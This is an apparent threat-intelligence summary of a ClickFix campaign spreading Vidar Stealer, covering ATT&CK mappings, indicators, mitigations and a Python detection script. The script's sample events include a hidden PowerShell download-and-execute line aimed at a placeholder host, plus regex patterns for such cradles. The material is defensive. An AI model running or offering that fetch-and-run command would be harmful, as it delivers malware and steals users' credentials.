Full Report
The Australian Cyber Security Centre (ACSC) is warning organizations of an ongoing malware campaign using the ClickFix social engineering technique to distribute the Vidar Stealer info-stealing malware. [...]
Analysis Summary
# Tool/Technique: ClickFix & Vidar Stealer
## Overview
ClickFix is a sophisticated social engineering technique designed to trick users into manually executing malicious payloads. In this specific campaign identified by the ACSC, ClickFix is utilized as a delivery mechanism for **Vidar Stealer**, a prominent Information Stealer (Infostealer) malware-as-a-service (MaaS). The attack leverages fake browser verification or CAPTCHA prompts to bypass automated security controls by involving manual user intervention.
## Technical Details
- **Type:** Malware family (Vidar) / Social Engineering Technique (ClickFix)
- **Platform:** Windows (Targeting browsers and system memory)
- **Capabilities:** Credential theft, data exfiltration, memory-only execution, C2 dead-drop resolution.
- **First Seen:** Vidar Stealer: Late 2018; ClickFix variants: Observed actively in 2024-2026.
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - [T1189 - Drive-by Compromise] (Compromised WordPress sites)
- **[TA0002 - Execution]**
  - [T1059.001 - Command and Scripting Interpreter: PowerShell]
  - [T1204.002 - User Execution: Malicious File/Command] (ClickFix interaction)
- **[TA0005 - Defense Evasion]**
  - [T1027 - Obfuscated Files or Information]
  - [T1070.004 - Indicator Removal: File Deletion] (Self-deletion of executable)
- **[TA0011 - Command and Control]**
  - [T1102.001 - Web Service: Dead Drop Resolver] (Telegram/Steam profiles)
- **[TA0009 - Collection]**
  - [T1539 - Steal Web Session Cookie]
  - [T1555 - Credentials from Password Stores]
## Functionality
### Core Capabilities
- **Information Theft:** Targets browser-stored passwords, cookies, autofill data, and cryptocurrency wallets.
- **System Reconnaissance:** Collects detailed system specifications and user profiles.
- **Payload Delivery:** Uses PowerShell via ClickFix to pull the secondary executable onto the host.
### Advanced Features
- **Anti-Forensics:** Vidar deletes its own executable from disk shortly after it starts and continues running from memory only, evading disk-based detection.
- **Stealth C2 Resolution:** Utilizes "dead-drop" URLs hosted on legitimate platforms (Telegram, Steam, Mastodon) to retrieve the actual Command and Control server IP, making traffic look legitimate.
- **Multi-threaded Operations:** Modern variants use multi-threading to speed up data collection and exfiltration.
## Indicators of Compromise
*Note: Specific hashes were not detailed in the source text, but behavioral and network patterns are highlighted.*
- **File Hashes:** [Specific hashes available in the official ACSC security bulletin]
- **File Names:** Common themes include fake Windows fixes or security certificates.
- **Network Indicators (Defanged):**
  - `t[.]me/` (Telegram bot channels used for C2 resolution)
  - `steamcommunity[.]com/profiles/` (Used for dead-drop URLs)
  - `wordpress-hosted-infrastructure[.]site` (Compromised WordPress redirectors)
- **Behavioral Indicators:**
  - PowerShell launched shortly after the user copies a command from a browser page.
  - Unexpected process termination followed by self-deletion of the initial binary.
  - Outbound connections to public social media platforms from non-browser processes.
## Associated Threat Actors
- **Vidar MaaS Operators:** Marketed as Malware-as-a-Service, used by various cybercriminal affiliates.
- **ClickFix Campaign Groups:** Various actors targeting Australian infrastructure and global users via TikTok and GitHub.
## Detection Methods
- **Signature-based detection:** Deploying AV signatures for known Vidar variants and PowerShell loaders.
- **Behavioral detection:**
  - Monitoring for PowerShell command lines containing `Invoke-Expression` (`IEX`) or base64-encoded strings pasted from the clipboard.
  - Detection of processes that delete their own executable shortly after starting.
- **Network Monitoring:** Identifying traffic to known dead-drop resolver patterns on Telegram or Steam.
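The three behavioral detections above, worked through as an added example (not code from the ACSC bulletin or from any vendor): a small Python script that evaluates constructed, Sysmon-style events (process creation, file deletion and network connection records with simplified field names) and flags the ClickFix PowerShell pattern, a binary deleting its own image file shortly after launch, and non-browser processes reaching the dead-drop platforms named on this page. The event layout, the hostnames used for the dead-drop check, the sample paths and the `example.invalid` URL are all assumptions made for the example.

```python
import re
from datetime import datetime

# Simplified, Sysmon-like event records (constructed sample data, not real telemetry).
# id 1 = process create, id 23 = file delete, id 3 = network connect.
EVENTS = [
    # ClickFix pattern: PowerShell launched under explorer.exe with an IEX download cradle
    {"id": 1, "time": "2025-01-10T09:00:00", "pid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr http://example.invalid/verify.txt)"'},
    # Benign interactive PowerShell: same parent, no suspicious command line
    {"id": 1, "time": "2025-01-10T09:01:00", "pid": 5001,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe"},
    # Dropped binary that deletes its own file 15 seconds after starting
    {"id": 1, "time": "2025-01-10T09:00:05", "pid": 6200,
     "image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "update.exe"},
    {"id": 23, "time": "2025-01-10T09:00:20", "pid": 6200,
     "image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "target": r"C:\Users\alice\AppData\Local\Temp\update.exe"},
    # Installer deleting an unrelated temp file: not self-deletion
    {"id": 1, "time": "2025-01-10T09:02:00", "pid": 7000,
     "image": r"C:\Users\alice\Downloads\setup.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "setup.exe"},
    {"id": 23, "time": "2025-01-10T09:02:10", "pid": 7000,
     "image": r"C:\Users\alice\Downloads\setup.exe",
     "target": r"C:\Users\alice\AppData\Local\Temp\tmp123.tmp"},
    # Dead-drop lookup from the dropped binary, then a direct C2 connection (TEST-NET-2 address)
    {"id": 3, "time": "2025-01-10T09:00:08", "pid": 6200,
     "image": r"C:\Users\alice\AppData\Local\Temp\update.exe", "dest_host": "t.me"},
    {"id": 3, "time": "2025-01-10T09:00:09", "pid": 6200,
     "image": r"C:\Users\alice\AppData\Local\Temp\update.exe", "dest_host": "198.51.100.7"},
    # A browser visiting Steam is expected and must not alert
    {"id": 3, "time": "2025-01-10T09:03:00", "pid": 3000,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "steamcommunity.com"},
]

PS_IMAGES = ("powershell.exe", "pwsh.exe")
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe", "brave.exe")
# Hostnames for the platforms the page names as dead-drop hosts (assumed values).
DEAD_DROP_HOSTS = ("t.me", "steamcommunity.com", "mastodon.social")
# Download-cradle and obfuscation markers typical of ClickFix one-liners.
SUSPICIOUS_PS = re.compile(
    r"(?i)(\biex\b|invoke-expression|-enc(odedcommand)?\b|frombase64string|-w(indowstyle)?\s+hidden)"
)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ts(s):
    return datetime.fromisoformat(s)


def detect_clickfix_powershell(events):
    """PIDs of PowerShell processes started under explorer.exe with a suspicious command line."""
    hits = []
    for e in events:
        if e["id"] != 1 or basename(e["image"]) not in PS_IMAGES:
            continue
        # The paste-and-run flow starts PowerShell from the shell (explorer.exe), not a script host.
        if basename(e["parent_image"]) != "explorer.exe":
            continue
        if SUSPICIOUS_PS.search(e["cmdline"]):
            hits.append(e["pid"])
    return hits


def detect_self_delete(events, window_seconds=60):
    """PIDs whose process deleted its own image file within window_seconds of creation."""
    created = {e["pid"]: e for e in events if e["id"] == 1}
    hits = []
    for e in events:
        if e["id"] != 23 or e["pid"] not in created:
            continue
        proc = created[e["pid"]]
        same_file = e["target"].lower() == proc["image"].lower()
        delta = (ts(e["time"]) - ts(proc["time"])).total_seconds()
        if same_file and 0 <= delta <= window_seconds:
            hits.append(e["pid"])
    return hits


def detect_dead_drop(events):
    """(pid, host) pairs for non-browser processes contacting a dead-drop platform."""
    hits = []
    for e in events:
        if e["id"] != 3:
            continue
        host = e["dest_host"].lower()
        if not any(host == d or host.endswith("." + d) for d in DEAD_DROP_HOSTS):
            continue
        if basename(e["image"]) in BROWSERS:
            continue
        hits.append((e["pid"], host))
    return hits


def run_detections(events):
    return {
        "clickfix_powershell": detect_clickfix_powershell(events),
        "self_delete": detect_self_delete(events),
        "dead_drop": detect_dead_drop(events),
    }


if __name__ == "__main__":
    for name, result in run_detections(EVENTS).items():
        print(f"{name}: {result}")
```

The parent-process check is what keeps the first rule quiet on ordinary administrative PowerShell, and the self-deletion rule keys on the deleted path matching the deleting process's own image rather than on any deletion in a temp folder. In production the event fields would come from Sysmon or an EDR rather than an inline list, and the dead-drop rule would be correlated with the PowerShell and self-deletion hits on the same host.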
## Mitigation Strategies
- **Technical Controls:**
  - Restrict PowerShell usage (e.g., enforce Constrained Language Mode and a restrictive execution policy).
  - Implement application allow-listing to prevent unauthorized binaries from running.
- **Software Hardening:**
  - For WordPress admins: promptly update themes and plugins, and remove unused add-ons to prevent site compromise.
- **User Education:** Teach users to recognize that legitimate CAPTCHAs or Cloudflare checks never require copying and pasting commands into a terminal/PowerShell.
## Related Tools/Techniques
- **Lumma Stealer:** Often uses similar ClickFix/Fake CAPTCHA delivery methods.
- **StealC:** A competing info-stealer often distributed via similar MaaS channels.
- **ClearFake:** A neighboring social engineering campaign that uses fake browser update prompts.